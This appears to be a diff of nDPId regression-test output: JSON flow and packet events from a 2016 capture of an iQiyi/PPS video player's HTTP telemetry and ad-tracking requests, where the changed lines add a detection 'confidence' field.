{"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01438{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"}
-00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01960{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="}
-01701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+01727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
